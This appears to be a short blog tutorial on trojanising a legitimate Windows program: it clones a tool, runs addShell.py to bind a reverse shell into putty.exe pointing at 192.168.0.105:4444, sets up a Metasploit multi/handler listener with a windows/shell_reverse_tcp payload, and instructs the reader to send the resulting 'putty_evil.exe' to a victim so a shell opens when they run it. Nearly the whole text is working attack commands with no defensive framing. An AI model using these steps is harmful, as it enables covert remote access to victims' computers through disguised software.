First clone cypher
repository from github, to do so type:
git clone https://github.com/xan7r/cypher.git
Now choose an executable file and copy to cypher folder to bind the cypher
with any .exe file
Here in my case I have copied putty.exe as a file to bind with cipher
Note: only executable file can be binded.
Now run the following command
python addShell.py -f ./putty.exe -H 192.168.0.105 -P 4444 -p 0
Now
we need to set up a listener to handle reverse connection sent by victim when
the exploit successfully executed. Start metasploit using msfconsole
use exploit/multi/handler
set payload windows/shell_reverse_tcp
set lhost 192.168.0.105
set lport 4444
exploit
Now
send the binded putty_evil .exe to the victim, as soon as he opens the
file a shell session will open
0 comments:
Post a Comment